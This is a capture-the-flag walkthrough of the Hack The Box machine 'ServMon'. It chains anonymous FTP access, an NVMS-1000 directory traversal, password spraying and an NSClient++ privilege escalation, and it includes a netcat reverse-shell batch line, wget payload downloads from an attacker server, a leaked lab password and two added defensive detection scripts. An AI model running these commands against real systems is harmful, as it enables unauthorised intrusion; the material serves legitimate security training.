The document details a penetration testing process on a target machine with IP 10.10.10.184, highlighting various open ports and services discovered through Nmap scans. It describes attempts to access the system via FTP and HTTP, successful anonymous FTP login, and exploitation of vulnerabilities leading to user and root access. The process includes obtaining credentials, executing scripts for privilege escalation, and ultimately retrieving user and root flags.
ServMon

Status Completed

Nmap Scan

[~/HTB/ServMon] - hak101> nmap --min-rate 10000 -p- 10.10.10.184

Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 01:05 EDT
Nmap scan report for 10.10.10.184
Host is up (0.13s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5666/tcp open nrpe
6063/tcp open x11
6699/tcp open napster
8443/tcp open https-alt
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown

[~/HTB/ServMon] - hak101> nmap 10.10.10.184 -p 21,22,80,135,139,445,5666,6063,6699,8443,49664,49665,49666,49667,49668,49669,49670 -sV -sC -vv

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_8.0 (protocol 2.0)
80/tcp open http syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
5666/tcp open tcpwrapped syn-ack ttl 127
6063/tcp open x11? syn-ack ttl 127
6699/tcp open napster? syn-ack ttl 127
8443/tcp open ssl/https-alt syn-ack ttl 127
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

Port 80 is open, so it probably serves a web page; we check that first.

It appears to be a login portal of some kind. Default credentials such as admin:admin did not work, so there is not much more to do here.

Next we check for SMB shares:

[~/HTB/ServMon] - hak101> netexec smb 10.10.10.184 -u '.' -p '' --shares

[~/HTB/ServMon] - hak101> netexec smb 10.10.10.184 -u '' -p '' --shares

We were not able to list any shares. Since there is a website, we can try directory brute-forcing:

[~/HTB/ServMon] - hak101> dirsearch -u http://10.10.10.184 -x 404

No luck here either.

Since the FTP port is also open, we can try an anonymous login.

We were able to log in to FTP anonymously, and we can see a file named Confidential.txt in the Nadine folder, so we download it:

ftp> get Confidential.txt

The file contains a short list of instructions.

Looking in the other user's directory, Nathan, we can see a file named 'Notes to do.txt'.

Contents of that file:

Next let's look at the Burp response for the login request.

We can see that it returns a customised error code. The software is NVMS-1000 (shown in the page tab itself), so we can search for exploits:

searchsploit nvms 1000

There are two results for the software, and both are directory traversal, which gives us the next path for exploitation.

We can confirm the vulnerability by modifying the request in Burp with a directory traversal payload such as:

/../../../../../../../../../../../../windows/win.ini

which works!
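From the defender's side, the traversal above is easy to spot in web-server access logs once request paths are decoded and the '..' segments are followed. This Python script is an added example, not code from the original writeup; the log lines and their 'ip method path status' layout are constructed, and it also catches double URL-encoded variants, which the page's request did not use.

```python
# Flag directory-traversal requests in web-server access logs.
# Added example for this writeup, not code from the original page. The log
# lines and their 'ip method path status' layout are constructed here.
import posixpath
import re
from urllib.parse import unquote

# Constructed sample log: benign requests plus traversal attempts of the
# kind used against NVMS-1000 above, one of them double URL-encoded.
SAMPLE_LOG = """\
10.10.14.3 GET /Pages/login.htm 200
10.10.14.3 GET /../../../../../../../../../../../../windows/win.ini 200
10.10.14.3 GET /%252e%252e/%252e%252e/%252e%252e/users/nathan/desktop/passwords.txt 200
10.10.14.3 GET /images/a/../logo.png 304
"""
LINE_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$")

def decode_path(raw):
    """Drop the query string, percent-decode until stable (bounded, so
    double encoding such as %252e is unwrapped) and unify slashes."""
    decoded = raw.split("?", 1)[0]
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return decoded.replace("\\", "/")

def escapes_webroot(raw):
    """True when '..' climbs above the web root at any point; normpath
    alone would silently drop a leading '..' and hide the attempt."""
    depth = 0
    for seg in decode_path(raw).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def find_traversals(log_text):
    """Return the offending lines with the file each one resolved to."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and escapes_webroot(m["path"]):
            target = posixpath.normpath(decode_path(m["path"]))
            hits.append({"ip": m["ip"], "status": m["status"], "target": target})
    return hits
```

The resolved target tells the analyst which file was actually read, which is what matters when deciding whether credentials (like the passwords.txt above) need rotating.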

We can also check out the other web server running on port 8443:

https://10.10.10.184:8443

Visiting the site does not give us much, but we learn which software it is running: NSClient.

Note: this website is quite messed up and annoying.

We can search for possible exploits again with searchsploit:

searchsploit NSClient

Searching online, the available exploits are mostly privilege escalation exploits, so we first need to find some credentials. We have to do more directory traversal for this, and we also have a clue from the text file we got earlier via FTP: a Password.txt was left in the Desktop folder. That message was sent by Nadine and there are only two users, so we check Nathan's Desktop directory:

/../../../../../../../../../../../../users/nathan/desktop/passwords.txt

We get a bunch of passwords. We save them to a list and check whether any of them authenticates.

Once saved, we can use netexec to password spray:

netexec smb 10.10.10.184 -u users -p passwords.txt

We got a successful authentication:

Nadine:L1k3B1gBut7s@W0rk

We can try to SSH in with that account, and we get access.

User Flag

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
f840e73b56abc3d6b8915d06ae98****

Now that we have initial access, we can do privilege escalation with the exploit we found earlier. Searching the box a little more, we find more credentials for the web page in the C:\Program Files\NSClient++ directory (in nsclient.ini):

ew2x6SsGTxjRwXOT

We could also have used this command:

nscp web -- password --display

But the web server can only be reached from the box's internal network, so we connect with a port forward over SSH, supplying the password with a tool called sshpass:

sshpass -p 'L1k3B1gBut7s@W0rk' ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443

We get the shell again, and this time we can reach the web page at https://127.0.0.1:8443/

We enter the credentials we got from nsclient.ini, and it works!

For the privilege escalation exploit we need two files: 1. nc64.exe, which can be downloaded, and 2. a shell.bat file that executes nc64.exe.

shell.bat:

\programdata\nc.exe 10.10.14.24 443 -e cmd

Next we need to upload the files to the \programdata\ directory. We can do this by starting a Python HTTP server and fetching the files with wget:

[~/HTB/ServMon] - hak101> python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

On the server:

nadine@SERVMON C:\ProgramData> powershell wget http://10.10.14.3/nc64.exe -outfile nc.exe
nadine@SERVMON C:\ProgramData> powershell wget http://10.10.14.3/shell.bat -outfile shell.bat

Once executed, we can see that the files have been uploaded successfully.

Then we go to Settings > external scripts > scripts in the web page and click "+Add new".

We add a command and specify the path to our script: we use df for the default, then for the key we enter command and for the value the path to our bat script.

Once we click Add we can see that it has been added. Next we create a schedule for this script by going to scheduler > schedules and making the following configuration.

Now we click Add, then with the edit functions we change a few things as seen before.

Add again, then go to the Control tab and reload. Before doing this, set up the reverse shell listener:

[~/HTB/ServMon] - hak101> rlwrap nc -lvnp 443
listening on [any] 443 ...

It just keeps loading for a long time with no output, so we have to try a different approach. We can use an exploit from GitHub:

https://github.com/xtizi/NSClient-0.5.2.35---Privilege-Escalation

Executing the script:

[~/HTB/ServMon/NSClient-0.5.2.35---Privilege-Escalation] - hak101> python3 exploit.py "C:\programdata\nc.exe 10.10.14.3 443 -e cmd.exe" https://127.0.0.1:8443 ew2x6SsGTxjRwXOT

Netcat listener:

[~/HTB/ServMon] - hak101> nc -nvlp 443
listening on [any] 443 ...

And we get a reverse connection!
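The escalation works because the NSClient++ web UI, external scripts and scheduler are all enabled and the web password sits in a config file a low-privileged user can read. As a defender-side addition (not code from the original writeup or from NSClient++), this Python script audits an nsclient.ini for exactly those settings; the sample config uses the real NSClient++ section and key names with made-up values, and the finding codes are my own.

```python
# Audit an NSClient++ nsclient.ini for the settings this chain relied on.
# Added example, not part of the original writeup; the sample config is
# constructed (real NSClient++ section and key names, made-up values) and
# the finding codes are my own.
import configparser

SAMPLE_INI = """\
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled
Scheduler = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = PLACEHOLDER-NOT-A-REAL-PASSWORD

[/settings/external scripts]
allow arguments = true
"""

def load_ini(text):
    # interpolation off so a '%' in a password does not break parsing
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None)
    cp.read_string(text)
    return cp

def is_on(cp, section, key):
    return cp.get(section, key, fallback="").strip().lower() in ("enabled", "true", "1", "yes")

def audit_nsclient_ini(text):
    """Return a list of finding codes; an empty list means nothing flagged."""
    cp = load_ini(text)
    web = is_on(cp, "/modules", "webserver")
    ext = is_on(cp, "/modules", "checkexternalscripts")
    findings = []
    if cp.get("/settings/default", "password", fallback=""):
        # on the box a normal user could read this file; it must be admin-only
        findings.append("PLAINTEXT_PASSWORD_IN_INI")
    if web and ext:
        # web UI + external scripts lets anyone holding the password register
        # a script that runs with the service's privileges (the path used above)
        findings.append("WEB_CAN_REGISTER_SERVICE_SCRIPTS")
    if ext and is_on(cp, "/settings/external scripts", "allow arguments"):
        findings.append("EXTERNAL_SCRIPT_ARGUMENTS_ALLOWED")
    hosts = [h.strip() for h in cp.get("/settings/default", "allowed hosts", fallback="").split(",")]
    if web and any(h and h not in ("127.0.0.1", "::1", "localhost") for h in hosts):
        findings.append("WEB_REACHABLE_BEYOND_LOOPBACK")
    return findings
```

Note that a loopback-only "allowed hosts" is not a mitigation on its own: the writeup reached the UI through an SSH port forward, so the password's file permissions and the external-scripts module are what need attention.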

Root Flag

C:\Users\Administrator\Desktop>type root.txt
type root.txt
0d5661e73bb694415f4b991e94a7****
